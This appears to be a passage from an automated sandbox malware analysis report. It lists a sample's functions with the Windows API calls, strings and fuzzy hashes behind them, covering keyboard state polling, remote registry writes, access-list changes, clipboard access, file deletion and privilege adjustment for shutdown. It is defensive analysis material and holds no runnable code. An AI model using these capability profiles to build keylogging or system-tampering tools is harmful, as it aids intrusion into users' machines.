                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0087F2B8
                                                            • _wcscmp.LIBCMT ref: 0087F2DF
                                                            • _wcscmp.LIBCMT ref: 0087F2F6
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0087F308
                                                            • SetCurrentDirectoryW.KERNEL32(008CA5A0), ref: 0087F326
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0087F330
                                                            • FindClose.KERNEL32(00000000), ref: 0087F33D
                                                            • FindClose.KERNEL32(00000000), ref: 0087F34F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: a7422f33c44d8b6cc83088270bcfd2db7242809a9d50aca1d1c049ee24f5a3a3
                                                            • Instruction ID: 45a08eeb80018353ba3cd6508f3f55782457bf1c3f8812951a0a8495e8660e41
                                                            • Opcode Fuzzy Hash: a7422f33c44d8b6cc83088270bcfd2db7242809a9d50aca1d1c049ee24f5a3a3
                                                            • Instruction Fuzzy Hash: 6B31A5766002196BDB14EBB5DC49AEE73ACFF48360F148176EA18D3192EB34DA45CA50
                                                            Function 00890AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00890BDE
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0089F910,00000000,?,00000000,?,?), ref: 00890C4C
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00890C94
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00890D1D
                                                            • RegCloseKey.ADVAPI32(?), ref: 0089103D
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0089104A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: 0ccabfbcb4b834ee189655ca62d7c27a99eefbd591f1b437fe643195f7232743
                                                            • Instruction ID: 3e0fb9519d7907486ff3d25fa5144b1fab71bbd5756846a755a9e2c7bc10f1be
                                                            • Opcode Fuzzy Hash: 0ccabfbcb4b834ee189655ca62d7c27a99eefbd591f1b437fe643195f7232743
                                                            • Instruction Fuzzy Hash: 6D022A752046119FCB14EF18C895E6AB7E9FF88714F08885DF999DB262CB31ED41CB82
                                                            Function 0087F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0087F37E
                                                            • _wcscmp.LIBCMT ref: 0087F393
                                                            • _wcscmp.LIBCMT ref: 0087F3AA
                                                              • Part of subcall function 008745C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008745DC
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0087F3D9
                                                            • FindClose.KERNEL32(00000000), ref: 0087F3E4
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0087F400
                                                            • _wcscmp.LIBCMT ref: 0087F427
                                                            • _wcscmp.LIBCMT ref: 0087F43E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0087F450
                                                            • SetCurrentDirectoryW.KERNEL32(008CA5A0), ref: 0087F46E
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0087F478
                                                            • FindClose.KERNEL32(00000000), ref: 0087F485
                                                            • FindClose.KERNEL32(00000000), ref: 0087F497
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: 1fd2cd03cf12fb2f677b464c25bb1cab43994d532fac3cf868f8c154fc8cb80f
                                                            • Instruction ID: 0eb9383cd7cb58363040271e41e9dd819ac73775a5c572375c63c3ef7fad4d97
                                                            • Opcode Fuzzy Hash: 1fd2cd03cf12fb2f677b464c25bb1cab43994d532fac3cf868f8c154fc8cb80f
                                                            • Instruction Fuzzy Hash: F631F5316012196BCF14ABB5EC88ADE73ACFF49324F148175EA18E31A2D734DE44CA64
                                                            Function 008681F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0086874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00868766
                                                              • Part of subcall function 0086874A: GetLastError.KERNEL32(?,0086822A,?,?,?), ref: 00868770
                                                              • Part of subcall function 0086874A: GetProcessHeap.KERNEL32(00000008,?,?,0086822A,?,?,?), ref: 0086877F
                                                              • Part of subcall function 0086874A: HeapAlloc.KERNEL32(00000000,?,0086822A,?,?,?), ref: 00868786
                                                              • Part of subcall function 0086874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0086879D
                                                              • Part of subcall function 008687E7: GetProcessHeap.KERNEL32(00000008,00868240,00000000,00000000,?,00868240,?), ref: 008687F3
                                                              • Part of subcall function 008687E7: HeapAlloc.KERNEL32(00000000,?,00868240,?), ref: 008687FA
                                                              • Part of subcall function 008687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00868240,?), ref: 0086880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0086825B
                                                            • _memset.LIBCMT ref: 00868270
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0086828F
                                                            • GetLengthSid.ADVAPI32(?), ref: 008682A0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 008682DD
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008682F9
                                                            • GetLengthSid.ADVAPI32(?), ref: 00868316
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00868325
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0086832C
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0086834D
                                                            • CopySid.ADVAPI32(00000000), ref: 00868354
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00868385
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008683AB
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008683BF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 70d0519bff27642fe3a18c45e781ceeb5fcdb3e8b1578785ba420f9ece227b91
                                                            • Instruction ID: c6f42a042d23b395b269831533a689091c3bb6f9688ee1aa614eeb12190db36e
                                                            • Opcode Fuzzy Hash: 70d0519bff27642fe3a18c45e781ceeb5fcdb3e8b1578785ba420f9ece227b91
                                                            • Instruction Fuzzy Hash: 39613B71900609EFDF04DFA4DD45AAEBBB9FF04700F14826AF919EA391DB319A15CB60
                                                            Function 00826843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                            • API String ID: 0-4052911093
                                                            • Opcode ID: 8beebd48d551a562e194cc4339037fa329fdd612cc7fc22929b7a51061235dd8
                                                            • Instruction ID: 9b5785049a97445087d25a8264393558a99fa11c631dc796acd98482e2a56866
                                                            • Opcode Fuzzy Hash: 8beebd48d551a562e194cc4339037fa329fdd612cc7fc22929b7a51061235dd8
                                                            • Instruction Fuzzy Hash: 38729375E00229DBDF14CF58D8857AEB7B5FF48310F19816AE949EB281EB309D81CB91
                                                            Function 00890665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00890038,?,?), ref: 008910BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00890737
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008907D6
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0089086E
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00890AAD
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00890ABA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: 2d135b2e6c59a3bfa1141165e21558cbf27f06b5c999dd376df925f03775b268
                                                            • Instruction ID: e70a49f2fa6e3a0cfa0aaca12e41eb9f36aeb94785d3b467a12d66a48b9a3b20
                                                            • Opcode Fuzzy Hash: 2d135b2e6c59a3bfa1141165e21558cbf27f06b5c999dd376df925f03775b268
                                                            • Instruction Fuzzy Hash: D0E15F71604210AFCB14EF28C895E6ABBE9FF89714B08856DF499D7262DB30ED41CF52
                                                            Function 00870219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00870241
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 008702C2
                                                            • GetKeyState.USER32(000000A0), ref: 008702DD
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 008702F7
                                                            • GetKeyState.USER32(000000A1), ref: 0087030C
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00870324
                                                            • GetKeyState.USER32(00000011), ref: 00870336
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0087034E
                                                            • GetKeyState.USER32(00000012), ref: 00870360
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00870378
                                                            • GetKeyState.USER32(0000005B), ref: 0087038A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 3290486af80e7d0de36f91be0db7f0796686d58d6ee0bfcc03b81e9aebffb528
                                                            • Instruction ID: f472e504c47241d35bef12d62ba3255bbc65f4c30982bdefc8b1a4403e00ac1e
                                                            • Opcode Fuzzy Hash: 3290486af80e7d0de36f91be0db7f0796686d58d6ee0bfcc03b81e9aebffb528
                                                            • Instruction Fuzzy Hash: D84187245147C9EAFF355B6488083A5BAA0FB12344F08C15ED6CDD66C7E794D9C48F92
                                                            Function 008886D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • CoInitialize.OLE32 ref: 00888718
                                                            • CoUninitialize.OLE32 ref: 00888723
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,008A2BEC,?), ref: 00888783
                                                            • IIDFromString.OLE32(?,?), ref: 008887F6
                                                            • VariantInit.OLEAUT32(?), ref: 00888890
                                                            • VariantClear.OLEAUT32(?), ref: 008888F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: 701da6e8ed5358627be0e313c9c8037487fc35866c51eba903e8d70fd17d26f1
                                                            • Instruction ID: 4c59c483f8710295f175b07fdacccfcd2d5326c671eb00da64b933c47658ca3c
                                                            • Opcode Fuzzy Hash: 701da6e8ed5358627be0e313c9c8037487fc35866c51eba903e8d70fd17d26f1
                                                            • Instruction Fuzzy Hash: BE616A70608301DFD714EF28C948A6ABBE8FF44718F944829F995DB291DB74ED44CB92
                                                            Function 00884458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: aa26433bfeb996b9e3d8caef3e018a0d254fa8965db88d2864b8b39342b59c8c
                                                            • Instruction ID: 5f70d31f9ffad8f2bcfb3406f36485f68b769e7f85977f69ae07cd6e1c7a037d
                                                            • Opcode Fuzzy Hash: aa26433bfeb996b9e3d8caef3e018a0d254fa8965db88d2864b8b39342b59c8c
                                                            • Instruction Fuzzy Hash: C021A1362012219FDB15BF64EC09B6D7BA8FF14715F14802AFA4ADB2B2DB30AC00CB55
                                                            Function 00873A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008148A1,?,?,008137C0,?), ref: 008148CE
                                                              • Part of subcall function 00874CD3: GetFileAttributesW.KERNEL32(?,00873947), ref: 00874CD4
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00873ADF
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00873B87
                                                            • MoveFileW.KERNEL32(?,?), ref: 00873B9A
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00873BB7
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00873BD9
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00873BF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 5ea990fb6f9ca86c471be37d349a8584f0dc26c424d07be031a4a5b2254c0632
                                                            • Instruction ID: a4322fce9826a9ef726637fb8535a81e12afdcab39ec95113e5c545645e70a8d
                                                            • Opcode Fuzzy Hash: 5ea990fb6f9ca86c471be37d349a8584f0dc26c424d07be031a4a5b2254c0632
                                                            • Instruction Fuzzy Hash: 34519C318001199ACB05EBA4DD929EDB779FF14300F2481A9E446F7096EF20AF49DBA2
                                                            Function 0087F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0087F6AB
                                                            • Sleep.KERNEL32(0000000A), ref: 0087F6DB
                                                            • _wcscmp.LIBCMT ref: 0087F6EF
                                                            • _wcscmp.LIBCMT ref: 0087F70A
                                                            • FindNextFileW.KERNEL32(?,?), ref: 0087F7A8
                                                            • FindClose.KERNEL32(00000000), ref: 0087F7BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: b114cc404983de96ab146d7d137889f1b543d9b3a4c558263552cf972b5fc2cf
                                                            • Instruction ID: e60bde8493de3fe6defce707bcec17ce41ef419d28c53f36559107ee7a94dc13
                                                            • Opcode Fuzzy Hash: b114cc404983de96ab146d7d137889f1b543d9b3a4c558263552cf972b5fc2cf
                                                            • Instruction Fuzzy Hash: 7F41817190021A9FCF15DF64CC45AEEBBB8FF15350F14856AE919E2292DB30DE84CB91
                                                            Function 00824140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-1546025612
                                                            • Opcode ID: 410ff13a91dfbb39331d1ad8a6dd84361c2da3b294eda1476c2204a0ea40b755
                                                            • Instruction ID: faa6b7d6f2f6e8553ce3ee6c5c846a8e840fda571e69a8a594d939dc4a799593
                                                            • Opcode Fuzzy Hash: 410ff13a91dfbb39331d1ad8a6dd84361c2da3b294eda1476c2204a0ea40b755
                                                            • Instruction Fuzzy Hash: EEA26D74E0422ACBDF24CF58E9807ADB7B1FB54315F2491AAD85AE7280D7709EC5CB60
                                                            Function 008258C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: f103446076be3d16b323dbebae56834b71103df28bc04aeb019c5123bd9cc0d3
                                                            • Instruction ID: 986bb47d1376ff6a7956d2bba910e6b6c693a118e4997ae2458bfd00cb75ce68
                                                            • Opcode Fuzzy Hash: f103446076be3d16b323dbebae56834b71103df28bc04aeb019c5123bd9cc0d3
                                                            • Instruction Fuzzy Hash: 26128970A00619EFDF14CFA8E982AEEB7B5FF48300F104569E406E7291EB35AD51CB55
                                                            Function 0087545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00868CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00868D0D
                                                              • Part of subcall function 00868CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00868D3A
                                                              • Part of subcall function 00868CC3: GetLastError.KERNEL32 ref: 00868D47
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0087549B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
